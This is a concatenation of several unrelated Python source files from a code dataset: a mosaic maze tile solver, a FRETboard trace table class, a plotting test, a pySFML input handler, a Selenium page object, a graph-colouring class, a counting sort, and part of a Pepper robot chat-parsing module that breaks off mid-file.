[[0,1,1,0,1,0,1,1,0,1,1,0,1,0,0,0],\n [0,0,1,0,0,1,1,0,0,1,1,0,1,0,1,1],\n [0,1,1,0,0,1,0,0,1,0,0,0,0,1,1,0],\n [0,1,1,0,1,0,0,1,0,0,0,0,1,0,0,1],\n [0,0,0,1,1,0,0,1,1,0,1,1,1,0,0,1],\n [1,1,0,1,0,0,0,1,0,0,0,1,0,0,0,0],\n [1,0,0,0,1,1,0,1,0,0,0,1,1,0,0,0],\n [1,0,0,0,1,1,0,1,0,0,0,1,0,0,1,0],\n [0,0,0,0,0,0,0,1,0,1,0,0,1,0,0,0],\n [0,1,0,0,1,1,0,1,1,0,1,1,0,1,1,0],\n [1,0,0,1,1,0,0,1,1,1,0,1,0,1,1,0],\n [0,1,0,0,0,0,0,0,1,0,0,1,0,1,0,0],\n [1,0,0,1,0,0,1,0,0,1,1,0,1,0,1,1],\n [0,0,0,0,0,0,1,0,0,0,1,0,0,0,1,0],\n [1,0,0,1,0,0,0,0,0,0,0,1,1,0,0,1],\n [1,0,0,1,0,0,0,0,1,0,1,1,0,1,1,0]]\n\n\n\n# ------------------------------------------\n# functions to help out with tile activities\n# ------------------------------------------\n\n# rotate a tile's paths string, by the rotation factor given \n\ndef rotateTile(tile):\n\n if tile[1] == 0:\n edges = allTilesEdges[tile[0]]\n elif tile[1] == 1:\n edges = allTilesEdges[tile[0]]\n edges = edges[12:16] + edges[0:12]\n elif tile[1] == 2:\n edges = allTilesEdges[tile[0]]\n edges = edges[8:16] + edges[0:8]\n elif tile[1] == 3: \n edges = allTilesEdges[tile[0]]\n edges = edges[4:16] + edges[0:4]\n return edges\n\n\n \n# return the exit paths along the requested side of a tile \n\ndef getEdgePaths(tile, side): \n\n if side == \"N\":\n paths = rotateTile(tile)[0:4]\n elif side == \"E\":\n paths = rotateTile(tile)[4:8]\n elif side == \"S\":\n paths = rotateTile(tile)[8:12]\n elif side == \"W\":\n paths = rotateTile(tile)[12:16]\n return paths \n\n\n\n# compare the specified side of tile1 to the adjoining\n# side of tile2 e.g. W of tile 1 implies E of tile2\n\ndef compareEdgePaths(tile1, side1, tile2):\n\n edge1 = getEdgePaths(tile1, side1)\n\n if side1 == \"N\":\n side2 = \"S\"\n elif side1 == \"E\":\n side2 = \"W\"\n elif side1 == \"S\":\n side2 = \"N\"\n elif side1 == \"W\":\n side2 = \"E\"\n\n edge2 = getEdgePaths(tile2, side2)\n\n # reverse exit paths to compensate for clockwise string\n edge2 = edge2[::-1]\n\n if edge1 == edge2:\n return True\n else:\n return False\n\n\n\n# returns true if the array does not contain duplicate tile ids\ndef uniqueTiles(arrayOfTiles):\n\n i = 0\n for tileA in arrayOfTiles:\n i += 1\n for tileB in arrayOfTiles[i:]:\n if tileA[0] == tileB[0]:\n return False\n\n return True\n\n\n# returns an array of possible arrangements of four tiles\ndef validSquares():\n\n feasibleSquare = []\n \n for tileTL in allTiles:\n for tileTR in allTiles:\n for tileBL in allTiles:\n for tileBR in allTiles:\n \n square = []\n\n if compareEdgePaths(tileTL, \"E\", tileTR):\n if compareEdgePaths(tileTL, \"S\", tileBL):\n if compareEdgePaths(tileTR, \"S\", tileBR):\n if compareEdgePaths(tileBL, \"E\", tileBR):\n square.append(tileTL)\n square.append(tileTR)\n square.append(tileBL)\n square.append(tileBR)\n\n if uniqueTiles(square):\n feasibleSquare.append(square)\n return feasibleSquare\n\n\n# ------------------------------\n# main runtime to find solutions\n# ------------------------------\n\nprint(\"Generating valid 2x2 squares from tiles...\")\n\nresult = validSquares()\n\nprint(\"There are\", len(result), \"valid 2x2 squares.\") \nprint(\"Generating valid 2x2 squares with starting tile in correct position...\")\n\nstart = []\nfor chain in result:\n if chain[3] == (8, 0):\n start.append(chain) \n\nprint(\"There are\", len(start), \"valid 2x2 squares containing the starting tile in the correct position.\")\nprint(\"Generating feasible top 2x4 rows...\")\n\nfeasibleTopRow = []\nfor chainTL in start:\n for chainTR in result:\n topRow = []\n\n if 
compareEdgePaths(chainTL[1], \"E\", chainTR[0]):\n if compareEdgePaths(chainTL[3], \"E\", chainTR[2]):\n topRow.append(chainTL[0])\n topRow.append(chainTL[1])\n topRow.append(chainTL[2])\n topRow.append(chainTL[3])\n topRow.append(chainTR[0])\n topRow.append(chainTR[1])\n topRow.append(chainTR[2])\n topRow.append(chainTR[3])\n\n if uniqueTiles(topRow):\n feasibleTopRow.append(topRow)\n\nprint(\"There are\", len(feasibleTopRow), \"valid 2x4 top rows.\")\n\nanotherResult = []\nfor chain in result:\n anotherResult.append(chain)\n\nprint(\"Generating feasible bottom 2x4 rows...\")\n\nfeasibleBottomRow = []\nfor chainBL in result:\n for chainBR in anotherResult:\n bottomRow = []\n\n if compareEdgePaths(chainBL[1], \"E\", chainBR[0]):\n if compareEdgePaths(chainBL[3], \"E\", chainBR[2]):\n bottomRow.append(chainBL[0])\n bottomRow.append(chainBL[1])\n bottomRow.append(chainBL[2])\n bottomRow.append(chainBL[3])\n bottomRow.append(chainBR[0])\n bottomRow.append(chainBR[1])\n bottomRow.append(chainBR[2])\n bottomRow.append(chainBR[3])\n\n if uniqueTiles(bottomRow):\n feasibleBottomRow.append(bottomRow)\n\nprint(\"There are\", len(feasibleBottomRow), \"valid 2x4 bottom rows.\")\nprint(\"Generating feasible 4x4 grids\")\n\ncandidateSolutions = []\nfor topRow in feasibleTopRow:\n for bottomRow in feasibleBottomRow:\n candidate = []\n \n if compareEdgePaths(topRow[2], \"S\", bottomRow[0]):\n if compareEdgePaths(topRow[3], \"S\", bottomRow[1]):\n if compareEdgePaths(topRow[6], \"S\", bottomRow[4]):\n if compareEdgePaths(topRow[7], \"S\", bottomRow[5]):\n\n candidate.append(topRow[0])\n candidate.append(topRow[1])\n candidate.append(topRow[4])\n candidate.append(topRow[5])\n candidate.append(topRow[2])\n candidate.append(topRow[3])\n candidate.append(topRow[6])\n candidate.append(topRow[7])\n candidate.append(bottomRow[0])\n candidate.append(bottomRow[1])\n candidate.append(bottomRow[4])\n candidate.append(bottomRow[5])\n candidate.append(bottomRow[2])\n candidate.append(bottomRow[3])\n candidate.append(bottomRow[6])\n candidate.append(bottomRow[7])\n\n if uniqueTiles(candidate):\n candidateSolutions.append(candidate)\n\nprint()\nprint(\"The\", len(candidateSolutions), \"valid 4x4 grids are:\")\nfor line in range(len(candidateSolutions)):\n print(candidateSolutions[line])\n \n","sub_path":"mosaic-maze-solver.py","file_name":"mosaic-maze-solver.py","file_ext":"py","file_size_in_byte":9041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"646220009","text":"import numpy as np\nimport base64\nimport pandas as pd\nfrom time import sleep\nfrom multiprocessing import Process\nfrom FRETboard.SafeH5 import SafeH5\nfrom FRETboard.SafeHDFStore import SafeHDFStore\nfrom FRETboard.FileParser import FileParser\nfrom FRETboard.helper_functions import numeric_timestamp, colnames_w_labels, colnames_alex_w_labels, df_empty\nfrom datetime import datetime\n\n\nclass MainTable(object):\n\n def __init__(self, framerate, eps, l, d, gamma, alex, h5_dir, main_process):\n self.main_process = main_process\n self.index_table = None # contains names and meta data of traces in hdf store\n self.manual_table = None # contains info as entered by user: is_labeled, is_junk\n self.traces_store_fn = h5_dir / 'traces_store.h5'\n self.predict_store_fn = h5_dir / 'predict_store_fn.h5'\n self.toparse_fn = h5_dir / 'to_parse.h5'\n self.label_dict = dict()\n self._eps, self._l, self._d, self._gamma, self._alex, self._traceswitch = eps, l, d, gamma, alex, 0\n self.framerate = framerate\n # _ = 
self.init_table(framerate, alex)\n # self.file_parser_process = self.init_table(framerate, alex)\n\n @property\n def framerate(self):\n return self._framerate\n\n @property\n def eps(self):\n return self._eps\n\n @property\n def l(self):\n return self._l\n\n @property\n def d(self):\n return self._d\n\n @property\n def gamma(self):\n return self._gamma\n\n @property\n def alex(self):\n return self._alex\n\n @property\n def traceswitch(self):\n return self._traceswitch\n\n @framerate.setter\n def framerate(self, framerate):\n self.data_timestamp = numeric_timestamp()\n with SafeH5(self.toparse_fn, 'a') as fh:\n fh.attrs['framerate'] = framerate\n fh.attrs['data_timestamp'] = self.data_timestamp\n self._framerate = framerate\n\n @alex.setter\n def alex(self, alex):\n self.data_timestamp = numeric_timestamp()\n with SafeH5(self.toparse_fn, 'a') as fh:\n fh.attrs['alex'] = alex\n fh.attrs['data_timestamp'] = self.data_timestamp\n self._alex = alex\n\n @traceswitch.setter\n def traceswitch(self, traceswitch):\n self.data_timestamp = numeric_timestamp()\n with SafeH5(self.toparse_fn, 'a') as fh:\n fh.attrs['traceswitch'] = traceswitch\n fh.attrs['data_timestamp'] = self.data_timestamp\n self._traceswitch = traceswitch\n\n @eps.setter\n def eps(self, eps):\n self.data_timestamp = numeric_timestamp()\n with SafeH5(self.toparse_fn, 'a') as fh:\n fh.attrs['eps'] = eps\n fh.attrs['data_timestamp'] = self.data_timestamp\n self._eps = eps\n\n @l.setter\n def l(self, l):\n self.data_timestamp = numeric_timestamp()\n with SafeH5(self.toparse_fn, 'a') as fh:\n fh.attrs['l'] = l\n fh.attrs['data_timestamp'] = self.data_timestamp\n self._l = l\n\n @d.setter\n def d(self, d):\n self.data_timestamp = numeric_timestamp()\n with SafeH5(self.toparse_fn, 'a') as fh:\n fh.attrs['d'] = d\n fh.attrs['data_timestamp'] = self.data_timestamp\n self._d = d\n\n @gamma.setter\n def gamma(self, gamma):\n self.data_timestamp = numeric_timestamp()\n with SafeH5(self.toparse_fn, 'a') as fh:\n fh.attrs['gamma'] = gamma\n fh.attrs['data_timestamp'] = self.data_timestamp\n self._gamma = gamma\n\n def init_table(self):\n # Create index table\n self.index_table = pd.DataFrame(\n columns=[\n 'trace', 'eps', 'l', 'd', 'gamma', 'data_timestamp','logprob', 'mod_timestamp'\n ]).set_index('trace')\n self.manual_table = df_empty(columns=['trace', 'is_labeled', 'is_junk'], dtypes=[str, bool, bool]).set_index('trace')\n with SafeHDFStore(self.traces_store_fn, 'a') as fh:\n fh.put('index_table', value=self.index_table, format='table', append=True)\n\n # make traces group\n with SafeH5(self.traces_store_fn, 'a') as fh:\n fh.create_group('traces')\n fh.create_group('raw')\n\n # hdf5 file for transfer to file parser\n self.data_timestamp = numeric_timestamp()\n with SafeH5(self.toparse_fn, 'w') as fh:\n (fh.attrs['data_timestamp'],\n fh.attrs['framerate'], fh.attrs['eps'],\n fh.attrs['l'], fh.attrs['d'],\n fh.attrs['gamma'], fh.attrs['alex'],\n fh.attrs['traceswitch']) = (self.data_timestamp, self.framerate, self.eps, self.l, self.d,\n self.gamma, self.alex, self.traceswitch)\n\n # hdf5 file for transfer to predictor\n with SafeH5(self.predict_store_fn, 'w') as fh:\n pass\n fp_process = Process(target=FileParser, args=(self.toparse_fn, self.traces_store_fn, self.main_process),\n name='file_parser')\n fp_process.start()\n return fp_process\n\n def get_raw(self, raw_fn):\n with SafeH5(self.traces_store_fn, 'r') as fh:\n raw_out = fh['raw/' + raw_fn][()]\n return raw_out\n\n def get_trace(self, idx, await_labels=False):\n with 
SafeH5(self.traces_store_fn, 'r') as fh:\n tup = fh['/traces/'+idx][()]\n dummy = np.array([]) if await_labels else np.zeros(tup.shape[1])\n while True:\n with SafeH5(self.predict_store_fn, 'r') as fh:\n pred = fh.get('/' + idx, dummy)[()]\n if len(pred):\n break # todo somehow signal that this example has to be classified fast\n # sleep(0.1)\n # if not self.manual_table.loc[idx, 'is_labeled']:\n # self.label_dict[idx] = pred\n return pd.DataFrame(data=np.vstack((tup, pred)).T, columns=colnames_alex_w_labels)\n\n def get_trace_dict(self, labeled_only=False):\n out_dict = {}\n idx_list = list(self.label_dict) if labeled_only else self.index_table.index\n for idx in idx_list:\n out_dict[str(idx)] = self.get_trace(idx)\n return out_dict\n\n def add_tuple(self, content, fn):\n _, b64_contents = content.split(\",\", 1) # remove the prefix that JS adds\n file_contents = base64.b64decode(b64_contents)\n with SafeH5(self.toparse_fn, 'a') as fh:\n fh[fn] = np.void(file_contents)\n\n def update_index(self):\n with SafeHDFStore(self.traces_store_fn, 'r') as fh:\n if 'index_table' in fh: self.index_table = fh.get('index_table')\n new_indices = [idx for idx in self.index_table.index if idx not in self.manual_table.index]\n if len(new_indices):\n new_df = pd.DataFrame({'trace': new_indices, 'is_labeled': False, 'is_junk': False}).set_index('trace')\n self.manual_table = pd.concat((self.manual_table, new_df))\n # invalidate accuracy cached property\n # self._invalidate_property('accuracy')\n\n # def push_index(self, idx, col, new):\n # with SafeHDFStore(self.traces_store_fn, 'a') as fh:\n # fh.loc[idx, col] = new\n # self.index_table.loc[idx, col] = new\n\n @property\n def accuracy(self):\n \"\"\"\n Return array of per-trace accuracy values and mean accuracy over entire dataset\n :return:\n \"\"\"\n if not len(self.label_dict):\n return np.array([np.nan], dtype=float), np.nan\n with SafeH5(self.predict_store_fn, 'r') as fh:\n # fh.get() returns None for missing predictions; guard before indexing with [()]\n datasets = {idx: fh.get('/' + idx, None) for idx in self.label_dict}\n pred_dict = {idx: (ds[()] if ds is not None else None) for idx, ds in datasets.items()}\n nb_correct = np.array([np.sum(self.label_dict[idx] == pred_dict[idx])\n for idx in self.label_dict if pred_dict[idx] is not None])\n nb_points = np.array([len(self.label_dict[idx]) for idx in self.label_dict if pred_dict[idx] is not None])\n return nb_correct / nb_points * 100, nb_correct.sum() / nb_points.sum() * 100\n\n # def _invalidate_property(self, prop):\n # if prop in self.__dict__:\n # del self.__dict__[prop]\n","sub_path":"FRETboard/MainTable_parallel.py","file_name":"MainTable_parallel.py","file_ext":"py","file_size_in_byte":8089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"632718144","text":"import autoarray as aa\nimport toy_gaussian.src.plot as aplt\nimport toy_gaussian as toy\nimport pytest\nimport os\nfrom os import path\n\ndirectory = path.dirname(path.realpath(__file__))\n\n\n@pytest.fixture(name=\"profile_plotter_path\")\ndef make_profile_plotter_setup():\n return \"{}/../../../test_files/plotting/profiles/\".format(\n os.path.dirname(os.path.realpath(__file__))\n )\n\n\n@pytest.fixture(autouse=True)\ndef set_config_path():\n aa.conf.instance = aa.conf.Config(\n path.join(directory, \"../test_files/plot\"), path.join(directory, \"output\")\n )\n\n\ndef test__all_quantities_are_output(\n gaussian_0,\n sub_grid_7x7,\n positions_7x7,\n include_all,\n profile_plotter_path,\n plot_patch,\n):\n\n toy.plot.profile_image(\n gaussian=gaussian_0,\n grid=sub_grid_7x7,\n positions=positions_7x7,\n include=include_all,\n 
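# note: the Output below is expected to write profile_image.png into profile_plotter_path (checked by the assert)\n 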
plotter=aplt.Plotter(output=aplt.Output(profile_plotter_path, format=\"png\")),\n )\n\n assert profile_plotter_path + \"profile_image.png\" in plot_patch.paths\n","sub_path":"toy_gaussian/test/unit/test_plot/test_gaussian_plots.py","file_name":"test_gaussian_plots.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"233805027","text":"from sfml import Mouse, CloseEvent, KeyEvent, MouseEvent, MouseWheelEvent, MouseButtonEvent, MouseMoveEvent, ResizeEvent, Keyboard\n\n\n \n \n \n\nclass KeyboardEvent:\n \"\"\"This class represents all the events that might be fired once a key is\n pressed. It also contains information about whether the event has already\n been consumed or not. It's up to the classes that might use events to decide\n if the input is consumed or not.\"\"\"\n\n def __init__(self, sfmlEvent):\n self.code = sfmlEvent.code\n self.alt = sfmlEvent.alt\n self.control = sfmlEvent.control\n self.shift = sfmlEvent.shift\n self.system = sfmlEvent.system \n self.consumed = False\n\nclass MouseEvent:\n def __init__(self, position):\n self.consumed = False\n self.position = position\n\n \nclass Input:\n @staticmethod\n def init(view):\n \"\"\"Given the root of the keyconfig ElementTree, parses it and configures\n all the keys.\"\"\"\n \n # Store the human view to get and send events\n Input.view = view\n \n # Set initial mouse position\n Input.oldMousePosition = (0, 0)\n \n Input.listeners = []\n \n @staticmethod\n def addListener(listener):\n Input.listeners.append(listener)\n \n @staticmethod\n def removeListener(listener):\n Input.listeners.remove(listener)\n \n @staticmethod\n def isKeyPressed(key):\n return Keyboard.is_key_pressed(key)\n \n @staticmethod\n def processInput():\n \"\"\"Processes pySFML input and pushes events onto the input stack\"\"\"\n for sfmlEvent in Input.view._window.events:\n if sfmlEvent == KeyEvent:\n if(sfmlEvent.pressed and sfmlEvent.released):\n print(\"[ERROR] Keyboard pressed and released at the same time?!\")\n event = KeyboardEvent(sfmlEvent)\n if sfmlEvent.pressed:\n Input.view.onKeyDownEvent(event)\n else:\n Input.view.onKeyUpEvent(event)\n \n # MOUSE EVENTS\n elif sfmlEvent == MouseEvent:\n event = MouseEvent(Mouse.get_position())\n Input.view.onMouseEvent(event)\n elif sfmlEvent == MouseWheelEvent:\n event = MouseEvent(sfmlEvent.position)\n event.delta = sfmlEvent.delta\n Input.view.onMouseWheelEvent(event)\n elif sfmlEvent == MouseButtonEvent:\n event = MouseEvent(sfmlEvent.position)\n if(sfmlEvent.pressed and sfmlEvent.released):\n print(\"[ERROR] Mouse pressed and released at the same time?!\")\n event.button = sfmlEvent.button\n if sfmlEvent.pressed:\n Input.view.onMouseDownEvent(event)\n else:\n Input.view.onMouseUpEvent(event)\n elif sfmlEvent == MouseMoveEvent:\n event = MouseEvent(sfmlEvent.position)\n event.oldPosition = Input.oldMousePosition\n Input.view.onMouseMoveEvent(event)\n Input.oldMousePosition = sfmlEvent.position\n elif sfmlEvent == CloseEvent:\n Input.view._gm._currentState.done = True\n for listener in Input.listeners:\n try:\n listener.onWindowCloseEvent(sfmlEvent)\n except AttributeError as err:\n if not (\"onWindowCloseEvent\" in err.args[0]):\n raise AttributeError(err)\n elif sfmlEvent == ResizeEvent:\n Input.view.resetCamera()\n for listener in Input.listeners:\n try:\n listener.onWindowResizeEvent(sfmlEvent)\n except AttributeError as err:\n if not (\"onWindowResizeEvent\" in err.args[0]):\n raise AttributeError(err)\n # 
Consumed!\n return False\n\n ","sub_path":"7drl/nEngine/Input.py","file_name":"Input.py","file_ext":"py","file_size_in_byte":3487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"325373528","text":"from core.base_page import BasePage\nfrom selenium.common.exceptions import NoSuchElementException\nimport logging, sys, time, os\n# logging.basicConfig(level=logging.INFO, stream=sys.stdout)\n\nclass SlideshowSettings(BasePage):\n def __init__(self, driver):\n \"\"\"\n :type browser: selenium.webdriver.*\n \"\"\"\n self.driver = driver\n self.logger = logging.getLogger(self.__class__.__name__)\n self.timeout = 15\n\n def navigate_to_slideshow_settings(driver):\n driver.logger.info('Navigate to Settings > Slide Show Settings')\n if not 'i18n_button_currenttab_td_middle' in driver.get_attribute(\"//SPAN[text()='Settings']/..\", \"class\"):\n driver.click(\"//SPAN[text()='Settings']\")\n assert driver.is_present(\"//a[contains(text(),'Slide Show Settings')]\")\n driver.click(\"//a[contains(text(),'Slide Show Settings')]\")\n assert driver.is_present(\"//select[@id='pauseintervals']\")\n\n\n def verify_ss_in_ss_settings(driver, slideshow, slides):\n driver.logger.info('verify slideshow {} has slides {} in Slide Show Settings'.format(slideshow, slides))\n assert driver.is_element_present(\"//option[contains(.,'\" + slideshow + \"')]\")\n driver.click(\"//option[contains(.,'\" + slideshow + \"')]\")\n slide_text =[]\n options = driver.get_elements(\"//select[@id='slides']/option\")\n for option in options:\n slide_text.append((option.text).strip())\n for val in slides:\n assert val in slide_text\n\n def delete_existing_slideshows(driver):\n driver.logger.info('Delete existing slideshow in Slide Show Settings')\n if driver.is_element_present(\"//select[@id='slideshows']/option\"):\n for i in range(10):\n driver.click(\"//select[@id='slideshows']/option\")\n driver.click(\"//input[@name='delete']\")\n assert 'Are you sure you want to delete slide show' in driver.close_alert_and_get_its_text()\n if not driver.is_element_present(\"//select[@id='slideshows']/option\"):\n break\n\n def create_slideshow_from_settings(driver, slideshow, pauseinterval=\"\"):\n driver.logger.info('create slideshow {} via Slide Show Settings'.format(slideshow))\n driver.click(\"//input[@name='new']\")\n driver.clear(\"//input[@id='name']\")\n driver.type(\"//input[@id='name']\", slideshow)\n if pauseinterval:\n driver.select_text(\"//select[@id='pauseintervals']\",pauseinterval)\n driver.click(\"//input[@id='save']\")\n assert slideshow+ \" was created.\" in driver.get_text(\"//ul[@class='statusmsg']\")\n","sub_path":"pages/slideshow_settings_page.py","file_name":"slideshow_settings_page.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"129247192","text":"\n\nclass ColorNode:\n\tvar = None\n\tcolor = None\n\tinterferences = None\n\n\tdef __init__(self):\n\t\tself.var = ''\n\t\tself.color = ''\n\t\tself.interferences = set()\n\nclass ColorGraph:\n\tnodes = None\n\tstack = None\n\n\tdef __init__(self):\n\t\tself.nodes = set()\n\t\tself.stack = []\n\n\tdef addNode(self, node):\n\t\tfor n in self.nodes:\n\t\t\tn.interferences.add(node)\n\t\t\tnode.interferences.add(n)\n\t\tself.nodes.add(node)\n\t\n\tdef remNode(self, node):\n\t\tfor n in 
self.nodes:\n\t\t\t# use discard, not remove: a node never appears in its own interference set\n\t\t\tn.interferences.discard(node)\n\t\tself.nodes.remove(node)\n","sub_path":"edu/trunk/compiler/UTexas/CS380C/lab4/3addr_to_ppc/colorgraph.py","file_name":"colorgraph.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"545507464","text":"\"\"\"Counting Sort\"\"\"\n\n\ndef counting_sort(L, m):\n \"\"\"\n The counting sort algorithm is a non-comparison based sorting\n algorithm that runs in O(n + m) time, below the Omega(n log n)\n lower bound that applies to comparison sorts. However, some\n pre-existing information must be provided, in the form of the\n parameter m, which indicates that the elements in L range from 0 to m.\n \"\"\"\n n = len(L)\n count = [0 for _ in range(m + 1)]\n positions = [0 for _ in range(m + 1)]\n output = [0 for _ in range(n)]\n\n # Construct Histogram\n for i in range(n):\n count[L[i]] += 1\n\n # Starting Positions\n for i in range(1, m + 1):\n positions[i] = positions[i - 1] + count[i - 1]\n\n # Output\n for i in range(n):\n output[positions[L[i]]] = L[i]\n positions[L[i]] += 1\n\n return output\n","sub_path":"algorithms/sorting/counting_sort.py","file_name":"counting_sort.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"572650527","text":"from __future__ import unicode_literals\n\nfrom pepper.language.ner import NER\nfrom pepper.language.pos import POS\nfrom pepper import logger\nfrom pepper import config\n\nfrom pepper.brain import LongTermMemory, Triple\nimport pepper.brain.utils.helper_functions as brain_help\n\nfrom nltk import CFG, RecursiveDescentParser\n\nfrom random import getrandbits\nfrom datetime import datetime\nimport enum\nimport json\nimport re\nimport os\nimport utils\n\n\nclass UtteranceType(enum.Enum):\n STATEMENT = 0\n QUESTION = 1\n EXPERIENCE = 2 # TODO\n\n\nclass Certainty(enum.Enum):\n CERTAIN = 0\n PROBABLE = 1\n POSSIBLE = 2\n UNDERSPECIFIED = 3\n\n\nclass Sentiment(enum.Enum):\n NEGATIVE = 0\n POSITIVE = 1\n\n\nclass Emotion(enum.Enum):\n ANGER = 0\n DISGUST = 1\n FEAR = 2\n HAPPINESS = 3\n SADNESS = 4\n SURPRISE = 5\n\n\nclass Chat(object):\n def __init__(self, speaker, context):\n \"\"\"\n Create Chat\n\n Parameters\n ----------\n speaker: str\n Name of speaker (a.k.a. the person Pepper has a chat with)\n \"\"\"\n\n self._id = getrandbits(128)\n self._context = context\n self._speaker = speaker\n self._utterances = []\n\n self._log = logger.getChild(\"{} ({})\".format(self.__class__.__name__, self.speaker))\n\n @property\n def context(self):\n \"\"\"\n Returns\n -------\n context: Context\n Context\n \"\"\"\n return self._context\n\n @property\n def speaker(self):\n \"\"\"\n Returns\n -------\n speaker: str\n Name of speaker (a.k.a. 
the person Pepper has a chat with)\n \"\"\"\n return self._speaker\n\n @property\n def id(self):\n \"\"\"\n Returns\n -------\n id: int\n Unique (random) identifier of this chat\n \"\"\"\n return self._id\n\n @property\n def utterances(self):\n \"\"\"\n Returns\n -------\n utterances: list of Utterance\n List of utterances that occurred in this chat\n \"\"\"\n return self._utterances\n\n @property\n def last_utterance(self):\n \"\"\"\n Returns\n -------\n last_utterance: Utterance\n Most recent Utterance\n \"\"\"\n return self._utterances[-1]\n\n def add_utterance(self, text, me):\n \"\"\"\n Add Utterance to Conversation\n\n Parameters\n ----------\n text: str\n Utterance Text to add to conversation\n\n Returns\n -------\n utterance: Utterance\n \"\"\"\n utterance = Utterance(self, text, me, len(self._utterances))\n self._log.info(utterance)\n self._utterances.append(utterance)\n return utterance\n\n def __repr__(self):\n return \"\\n\".join([str(utterance) for utterance in self._utterances])\n\n\nclass Utterance(object):\n def __init__(self, chat, transcript, me, turn):\n \"\"\"\n Construct Utterance Object\n\n Parameters\n ----------\n chat: Chat\n Reference to Chat Utterance is part of\n transcript: str\n Uttered text (Natural Language)\n me: bool\n True if Robot spoke, False if Person Spoke\n turn: int\n Utterance Turn\n \"\"\"\n\n self._chat = chat\n self._transcript = transcript\n self._me = me\n self._turn = turn\n self._datetime = datetime.now()\n\n self._tokens = self._clean(self._tokenize(transcript))\n self._parsed_tree = Parser().parse(self)\n\n @property\n def chat(self):\n \"\"\"\n Returns\n -------\n chat: Chat\n Utterance Chat\n \"\"\"\n return self._chat\n\n @property\n def type(self):\n # type: () -> UtteranceType\n raise NotImplementedError()\n\n @property\n def transcript(self):\n \"\"\"\n Returns\n -------\n transcript: str\n Utterance Transcript\n \"\"\"\n return self._transcript\n\n @property\n def me(self):\n # type: () -> bool\n \"\"\"\n Returns\n -------\n me: bool\n True if Robot spoke, False if Person Spoke\n \"\"\"\n return self._me\n\n @property\n def turn(self):\n # type: () -> int\n \"\"\"\n Returns\n -------\n turn: int\n Utterance Turn\n \"\"\"\n return self._turn\n\n @property\n def triple(self):\n # type: () -> Triple\n raise NotImplementedError()\n\n @property\n def datetime(self):\n return self._datetime\n\n @property\n def language(self):\n \"\"\"\n Returns\n -------\n language: str\n Original language of the Transcript\n \"\"\"\n raise NotImplementedError()\n\n @property\n def certainty(self):\n # type: () -> Certainty\n raise NotImplementedError()\n\n @property\n def sentiment(self):\n # type: () -> Sentiment\n raise NotImplementedError()\n\n @property\n def emotion(self):\n # type: () -> Emotion\n raise NotImplementedError()\n\n @property\n def tokens(self):\n \"\"\"\n Returns\n -------\n tokens: list of str\n Tokenized transcript\n \"\"\"\n return self._tokens\n\n @property\n def parsed_tree(self):\n \"\"\"\n Returns\n -------\n parsed_tree: ntlk Tree generated by the CFG parser\n \"\"\"\n return self._parsed_tree\n\n def _tokenize(self, transcript):\n \"\"\"\n Parameters\n ----------\n transcript: str\n Uttered text (Natural Language)\n\n Returns\n -------\n tokens: list of str\n Tokenized transcript: list of cleaned tokens\n - remove contractions\n \"\"\"\n\n tokens_raw = transcript.split()\n tokens = []\n for word in tokens_raw:\n clean_word = re.sub('[?!]', '', word)\n tokens.append(clean_word)\n return tokens\n\n def _clean(self, tokens):\n 
\"\"\"\n Parameters\n ----------\n tokens: list of str\n Tokenized transcript\n\n Returns\n -------\n cleaned_tokens: list of str\n Tokenized & Cleaned transcript\n \"\"\"\n\n # TODO: Remove Contractions\n\n return tokens\n\n def __repr__(self):\n author = config.NAME if self.me else self.chat.speaker\n return \"Utterance {:03d}: {:10s} -> {}\".format(self.turn, author, self.transcript)\n\n\nclass Parser(object):\n\n POS_TAGGER = None # Type: POS\n CFG_GRAMMAR_FILE = os.path.join(os.path.dirname(__file__), 'cfg.txt')\n\n def __init__(self):\n if not Parser.POS_TAGGER:\n Parser.POS_TAGGER = POS()\n\n with open(Parser.CFG_GRAMMAR_FILE) as cfg_file:\n self._cfg = cfg_file.read()\n\n def parse(self, utterance):\n tokenized_sentence = utterance.tokens\n pos = self.POS_TAGGER.tag(tokenized_sentence)\n #print(pos)\n\n '''\n doc = nlp(utterance.transcript)\n for token in doc:\n #print(token.text, token.lemma_, token.pos_)\n ind = 0\n for w in pos:\n if w[0]==token.text and w[1]!=token.pos_:\n print('mismatch ',w[1],token.pos_)\n if w[1]=='IN' and token.pos_=='VERB':\n pos[ind]=(token.text,'VBP')\n ind+=1\n '''\n\n ind = 0\n for w in tokenized_sentence:\n if w=='like':\n pos[ind] = (w, 'VBP')\n ind+=1\n\n\n for el in pos:\n if el[1].endswith('$'):\n new_rule = el[1][:-1] + 'POS -> \\'' + el[0] + '\\'\\n'\n else:\n new_rule = el[1] + ' -> \\'' + el[0] + '\\'\\n'\n if new_rule not in self._cfg:\n self._cfg += new_rule\n\n cfg_parser = CFG.fromstring(self._cfg)\n RD = RecursiveDescentParser(cfg_parser)\n parsed = RD.parse(tokenized_sentence)\n return [tree for tree in parsed]\n\n\nclass Analyzer(object):\n\n # Load Grammar Json\n GRAMMAR_JSON = os.path.join(os.path.dirname(__file__), 'grammar.json')\n with open(GRAMMAR_JSON) as json_file:\n GRAMMAR = json.load(json_file)['grammar']\n\n # Load Stanford Named Entity Recognition Server\n NER = None # type: NER\n\n def __init__(self, chat):\n \"\"\"\n Abstract Analyzer Object: call Analyzer.analyze(utterance) factory function\n\n Parameters\n ----------\n chat: Chat\n Chat to be analyzed\n \"\"\"\n\n if not Analyzer.NER:\n Analyzer.NER = NER('english.muc.7class.distsim.crf.ser')\n\n self._chat = chat\n self._log = logger.getChild(self.__class__.__name__)\n\n @staticmethod\n def analyze(chat):\n \"\"\"\n Analyzer factory function\n\n Find appropriate Analyzer for this utterance\n\n Parameters\n ----------\n chat: Chat\n Chat to be analyzed\n\n Returns\n -------\n analyzer: Analyzer\n Appropriate 